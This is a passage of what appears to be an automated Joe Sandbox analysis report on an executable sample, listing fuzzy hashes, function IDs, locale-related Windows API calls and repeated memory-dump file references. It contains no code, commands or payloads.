                                                                                                                        • Opcode Fuzzy Hash: 19d72f97b7d99f620658749f6876cd35770fc52d9dde7e14b69d7df5d49c560f
                                                                                                                        • Instruction Fuzzy Hash: 51E0C2B51442442BC2058F34D948AEB77996B82721F048A1ABCB8822E0E23D884DDA3A
                                                                                                                        APIs
                                                                                                                        • EnumSystemLocalesA.KERNEL32(00430320,00000001,00000000,?), ref: 004306A1
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1558314916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558361105.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558381417.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558395220.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558428438.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558480170.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558503817.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558520357.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558550742.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558712546.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558744777.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558771904.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558792384.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558817158.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558837724.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: EnumLocalesSystem
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2099609381-0
                                                                                                                        • Opcode ID: 30d1be683f272a08c0790b8b21df16f6b30667fd3acbf257a54d3f9a0b35c831
                                                                                                                        • Instruction ID: 54d17df95efd4fea5ab28ce8627b56d0c3c169f5056bfa7745a835ac7e03007b
                                                                                                                        • Opcode Fuzzy Hash: 30d1be683f272a08c0790b8b21df16f6b30667fd3acbf257a54d3f9a0b35c831
                                                                                                                        • Instruction Fuzzy Hash: 41F03C715713019EDBD0DFB8ED2A7693BE1EB85304F506A3EE841822A5C778649E8B0C
                                                                                                                        APIs
                                                                                                                        • GetLocaleInfoA.KERNEL32(?,00001004,?,00000006), ref: 00432571
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1558314916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558361105.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558381417.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558395220.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558428438.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558480170.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558503817.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558520357.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558550742.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558712546.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558744777.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558771904.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558792384.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558817158.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558837724.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: InfoLocale
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2299586839-0
                                                                                                                        • Opcode ID: 4d72925202115b99d5d7b8f4edc631b23003b5100efdd5749bbc6799c76358c4
                                                                                                                        • Instruction ID: 17f76300287a7d19cbd26b08af8320322d1628fa1681537f1a47a6f7f2395bee
                                                                                                                        • Opcode Fuzzy Hash: 4d72925202115b99d5d7b8f4edc631b23003b5100efdd5749bbc6799c76358c4
                                                                                                                        • Instruction Fuzzy Hash: 2EE09231B04208BBCB00EBB4ED01B9D77B8AB04318F1042A6F520D72C0EBB496048B59
                                                                                                                        APIs
                                                                                                                        • EnumSystemLocalesA.KERNEL32(0043053A,00000001,00000000,004562C0,0042635F,?,004809CC,?,?,00000000,?), ref: 00430700
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1558314916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558361105.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558381417.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558395220.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558428438.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558480170.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558503817.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558520357.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558550742.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558712546.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558744777.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558771904.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558792384.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558817158.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558837724.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: EnumLocalesSystem
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2099609381-0
                                                                                                                        • Opcode ID: 4c4d0a780be8e05bee1ffec57aaebf5c88fa93bafd2c860e70af7c595655c8b2
                                                                                                                        • Instruction ID: f2d345d28478ef9a94cd778bf2c05c4241d0faeb395d53aab50563b5c18227a9
                                                                                                                        • Opcode Fuzzy Hash: 4c4d0a780be8e05bee1ffec57aaebf5c88fa93bafd2c860e70af7c595655c8b2
                                                                                                                        • Instruction Fuzzy Hash: 77E09AB25B12409ED7909FB1FC1632D3BD1FB85708F505A3EE440822E6C7782488CB1C
                                                                                                                        APIs
                                                                                                                        • EnumSystemLocalesA.KERNEL32(0043021B,00000001,00000000,004562C0,0042635F,?,004809CC,?,?,00000000,?), ref: 00430625
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1558314916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558361105.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558381417.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558395220.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558428438.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558480170.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558503817.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558520357.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558550742.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558712546.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558744777.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558771904.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558792384.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558817158.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558837724.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: EnumLocalesSystem
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2099609381-0
                                                                                                                        • Opcode ID: 60c3cef7e41813c81970e8aa371923ba75d1669c9be8994eebbc24ba15ed5b1e
                                                                                                                        • Instruction ID: c519572493f4ad7763061febfb11964ecb3e895afacb9612d552e624a332fddb
                                                                                                                        • Opcode Fuzzy Hash: 60c3cef7e41813c81970e8aa371923ba75d1669c9be8994eebbc24ba15ed5b1e
                                                                                                                        • Instruction Fuzzy Hash: 6AD05EB0A603046EE7C08FB0BC597693AE0FF81B14F60AA6ED941810E0C6791889C70C
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1558314916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558361105.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558381417.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558395220.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558428438.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558480170.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558503817.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558520357.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558550742.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558712546.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558744777.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558771904.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558792384.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558817158.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558837724.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: FPN8
                                                                                                                        • API String ID: 0-3045010520
                                                                                                                        • Opcode ID: edb593c32b61e57108da3a0b80af04005ee91a1e55d6cc48912163f838f1da77
                                                                                                                        • Instruction ID: 0ae34cf69a8ab284ccd46dc62b6aad79bebef21a7217951b099a750fc97bdae0
                                                                                                                        • Opcode Fuzzy Hash: edb593c32b61e57108da3a0b80af04005ee91a1e55d6cc48912163f838f1da77
                                                                                                                        • Instruction Fuzzy Hash: 8561F7A2D082259BF7149B65DC849FB7774EF85310F1440BAD80D672C1E63C6EC5CB66
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1558314916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558361105.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558381417.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558395220.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558428438.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558480170.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558503817.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558520357.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558550742.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558712546.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558744777.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558771904.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558792384.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558817158.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558837724.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: @J2G
                                                                                                                        • API String ID: 0-3264548725
                                                                                                                        • Opcode ID: 81a836e66e4d380549ba96175722a1bbd639395fd3f17a86fd6a2d2d497a7908
                                                                                                                        • Instruction ID: 33fde268ea3d09e424a0bc3102b001c06874382390dbdac9628847d6a7409590
                                                                                                                        • Opcode Fuzzy Hash: 81a836e66e4d380549ba96175722a1bbd639395fd3f17a86fd6a2d2d497a7908
                                                                                                                        • Instruction Fuzzy Hash: F96154E2C112559BE7148B24DC98AFB7778EF81314F1581FED80AA7680D23C5ED2CA66
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1558314916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558361105.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558381417.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558395220.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558428438.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558480170.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558503817.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558520357.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558550742.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558712546.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558744777.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558771904.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558792384.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558817158.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558837724.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: b0f4d8db58f026a845213fc1b87d2411c782b3a521c0d40067012ddbee180b44
                                                                                                                        • Instruction ID: 8118a5aba1bf8fac790b82b1f093b7fb56dd6f0a1e18ac8f50b078235c599629
                                                                                                                        • Opcode Fuzzy Hash: b0f4d8db58f026a845213fc1b87d2411c782b3a521c0d40067012ddbee180b44
                                                                                                                        • Instruction Fuzzy Hash: 0A5159B2C042649FEB108B64DC546EB7B74EF46310F1441FAD94DAB282E23C4EC2CB56
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1558314916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558361105.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558381417.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558395220.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558428438.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558480170.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558503817.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558520357.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558550742.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558712546.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558744777.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558771904.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558792384.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558817158.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558837724.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 1a8cd5b1783ecb4e5ad5cd15b421a128cdc84403080d857b7d540abd7db69191
                                                                                                                        • Instruction ID: c6da21f01922a24bbf0247f3c2d5be0c5a260824f1796bbc47ac3f87726a43c0
                                                                                                                        • Opcode Fuzzy Hash: 1a8cd5b1783ecb4e5ad5cd15b421a128cdc84403080d857b7d540abd7db69191
                                                                                                                        • Instruction Fuzzy Hash: DC415BF3C106509FF7148A61DC446FB7B79EB41315F1841BAE809E62C2E57C4EC58762
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1558314916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558361105.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558381417.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558395220.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558428438.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558480170.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558503817.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558520357.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558550742.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558712546.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558744777.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558771904.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558792384.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558817158.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558837724.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 5142c530960aa0cb64c0203d5831d147cbc78878475bbbd9cee77f603bd720b8
                                                                                                                        • Instruction ID: 747d1d63339dfe1e000017c3f9986dc234f3fec8d3496a1f1af7502c3cf43142
                                                                                                                        • Opcode Fuzzy Hash: 5142c530960aa0cb64c0203d5831d147cbc78878475bbbd9cee77f603bd720b8
                                                                                                                        • Instruction Fuzzy Hash: D6315AF3C142509FF7148AA0DC94AF77BB9EB81314F29417FE849E6282D57C4EC58662
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
